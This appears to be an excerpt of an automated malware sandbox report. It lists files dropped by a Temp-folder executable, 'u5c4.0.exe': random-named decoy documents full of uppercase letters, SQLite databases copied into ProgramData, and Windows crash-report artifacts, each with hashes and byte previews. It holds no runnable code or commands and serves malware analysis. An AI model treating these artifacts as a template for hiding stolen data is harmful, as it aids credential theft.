Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\ProgramData\EFOYFBOLXA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\ProgramData\EHDHDHIECGCAEBFIIDHI

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCGIJDBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIIEGHJJDGHCAKEBGIJKJEBAFC

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HTAGVDFUIE.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\IEHDBGDHDAECBGDHJKFIDGCBFB

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFIEBFHIDBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJKKKJJJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_kO1P1YnLst.exe_4c824633669c49f0654a94edfc957b484331f1f_ed3814b0_b31a73a3-b069-4bc0-b171-85340e582538\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.087040161433622
Encrypted:	false
SSDEEP:	192:WkeMaQGzpt0ouk5Bjsq5eugCzuiFpZ24IO8q:pehQGzpuouk5BjgCzuiFpY4IO8q
MD5:	C1810ADDA784B6506FB25E4843E6AEB7
SHA1:	22938B484977DCE454CE5F8CC2CE98FD023101AA
SHA-256:	F7C88E91C16F4485D7EBFD30DEE12FF0643E8983396BE26DE3542A1CD342F245
SHA-512:	C628BB4189D0862263DC84D183F2B7EDB5AD2388FC950597C2A7C94629DF8755531F5FC33E1049C8B351695ECD6FF26F2026FDD5E8E6E702C5A452BC45D863B3
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.4.5.1.7.6.6.7.8.0.5.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.4.5.1.7.8.1.7.8.0.6.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.1.a.7.3.a.3.-.b.0.6.9.-.4.b.c.0.-.b.1.7.1.-.8.5.3.4.0.e.5.8.2.5.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.f.5.0.3.b.2.-.b.8.1.2.-.4.e.c.6.-.b.9.9.e.-.2.3.5.8.b.6.1.7.8.a.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.O.1.P.1.Y.n.L.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.4.-.0.0.0.1.-.0.0.1.4.-.4.6.2.0.-.a.b.8.1.2.b.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.a.5.6.d.4.2.8.0.e.a.2.1.d.f.f.3.5.b.8.9.f.5.7.4.4.3.7.3.3.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.4.b.d.2.0.a.5.4.9.e.4.0.d.8.b.9.4.6.a.9.b.f.5.4.3.9.0.0.4.e.6.1.1.1.1.0.0.f.9.!.k.O.1.P.1.Y.n.L.s.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u5c4.0.exe_6f888996e3cfc8e41cbd69f2aada922252844ac4_8bd4d979_f4cad45f-74cf-4b34-a79a-4811a67b30a4\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1421337636500375
Encrypted:	false
SSDEEP:	192:l4/av1r4Cr0mbwNjsqZrP2H9fmzuiFJZ24IO8dA:S/av1r4C4mbwNjlK+zuiFJY4IO8d
MD5:	E114CB05322CA1068E9BF883423C3A54
SHA1:	BD60B94DAB41DE42753D5F60EAC6D09A230AE043
SHA-256:	7434E47CB8CE9662040552F874BC08B8A290DB1F4842B2E5EAA6C72048581B3D
SHA-512:	2D3801E2E1CB3D0E62CCD85228AD20D5A319F31606C2B12853F9B388B778CC8A5D8F671CE9DDB31D0AAC8F0A368382B9C24461FB3EF3DF9B160C7058E6D4FD62
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.4.5.2.3.7.5.5.5.3.2.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.4.5.2.3.8.0.3.4.3.2.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.c.a.d.4.5.f.-.7.4.c.f.-.4.b.3.4.-.a.7.9.a.-.4.8.1.1.a.6.7.b.3.0.a.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.1.a.4.d.3.6.-.4.b.f.8.-.4.9.f.e.-.b.7.8.6.-.c.6.1.a.7.d.b.1.c.3.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.5.c.4...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.a.0.-.0.0.0.1.-.0.0.1.4.-.7.7.2.d.-.a.9.8.4.2.b.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.1.7.9.4.c.e.e.b.5.5.3.2.9.8.6.4.c.4.e.a.6.c.0.4.5.6.e.6.7.2.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.a.1.c.8.8.d.a.3.8.5.2.f.c.0.f.7.e.a.4.3.f.6.c.9.3.b.1.7.f.5.9.1.7.d.5.9.0.6.2.!.u.5.c.4...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA53C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Apr 26 22:47:17 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62102
Entropy (8bit):	2.7253424702120794
Encrypted:	false
SSDEEP:	384:orGFeKFtKgE0maGtZX8Jw0evSpSOct5tPZzREY:BFDagEiEXD0eqDctlr
MD5:	F6798B28AC8B276DBBBF4E5F28F4F85B
SHA1:	6D113CE7313BEE163FA100FBC6925D419AD7E03F
SHA-256:	2197951A01C604D782C20E43E87A3022EFB585D90FE1A88145ECB7AC8F4E8355
SHA-512:	B98C46E2FAAE96B91E97AB90F39FF595CBF36A41D47F0FAEB9975B1BE3DA0B23CC6B19C7A8F0CB06C4473BEA60ED2EB4743BBF04CD9C8E1F9BFF244A1B9F5B40
Malicious:	false
Preview:	MDMP..a..... .........,f............4............ ..<...........v9..........T.......8...........T...........8Z..^...........((.........................................................................................eJ.............GenuineIntel............T.............,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA608.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6300
Entropy (8bit):	3.7165084066206306
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbrh6TjYnJtFgaMQUT89b7qsf8gJm:R6l7wVeJrh6TjYnmpDT89b7qsf8gJm
MD5:	00587D348DDE5C3EA52102727A0E77FC
SHA1:	CEF1B0A51EE57922329509ACC3B6CDF97D87B7FB
SHA-256:	CFF14D3DC93EEED5FAF28A412CCFBB2AA73BB4ACABBC0EB59DAEB160BE491C4C
SHA-512:	10B4643408E76B40B730EC76E76B7D2ACEEC231AB844197258C26CCD0E73C43192B293783ECE2F073583644DC72AAE4AF329DA0394A855D15142409EC2D0FD63
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.6.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA647.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.430669765187322
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOiJg77aI9ncWpW8VYpYm8M4Jj1mtVFuU+q8lmTEVmFaTd:uIjfHI7ZV7VZJCuVmFaTd
MD5:	BF6E7182440E32FF8E5451E50811E394
SHA1:	6D5B9E2C1411C431A1AE00FF3D559BF1C6FECEF8
SHA-256:	3071C2317ADB1F73F4DF1EFFF3720CABBCFFCB6D06D93E7F1E7807159265B54F
SHA-512:	3052E6BC94806A898B87C3BD409B57D4424EA0DA3B4799708ED44AFC2B5A1292002D8B437B442CC1FA736C936BFB69FF0EB8B710147DAF8608921CF6C9DC954F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297469" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB761.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 26 22:46:17 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	50865
Entropy (8bit):	2.953275148361787
Encrypted:	false
SSDEEP:	384:yXYR9jXF0XikAGmE1Bn2I3t4uW8xcH5yxlaL91DDq:BzJ0XikAGmE1koW8O0s913q
MD5:	9419A8C26FC684B72918B7455713C2E5
SHA1:	CF7BA2817740FEA7B44496DA59FB7B128157B3E2
SHA-256:	81C993E6CF36379708C0BEDA0A8841D680109FDAB2C903D2201EE8849B6125D4
SHA-512:	83A5BBFD20FD1B2C1514365BBFAEC92C358558E56655647D2775045BAF2DB3AD02335B026B89F1187D427FE55D337F047157CC4B62BD8FD17CC0F3A27B7B9192
Malicious:	false
Preview:	MDMP..a..... .........,f............4...........H...H.......d....#......T...D?..........`.......8...........T............9...............(...........*..............................................................................eJ......x+......GenuineIntel............T.............,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC34.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.6922489130310385
Encrypted:	false
SSDEEP:	192:R6l7wVeJx36Ln6Y9JSUj5agmfjZFpDF89bausfv+m:R6lXJx6T6YDSUj5agmfjZiatf/
MD5:	67ECD5BF446C59A165E7705B4F69843C
SHA1:	0362B6E28C1301F3B19FEF617D26BE6F664DD788
SHA-256:	2449D70B999E0982376627EABAD4DC32244DDCBF317495F6C66A8279C9886B5B
SHA-512:	322A3563E56B11DB510F926BBD258E773C96907ED49C18F421A4F77F7E7AE0E2B057A624B2877A57B82D798F295B49C9D1CFD3DEF26FC24C04EDD5D283B58DDF
Malicious:	false
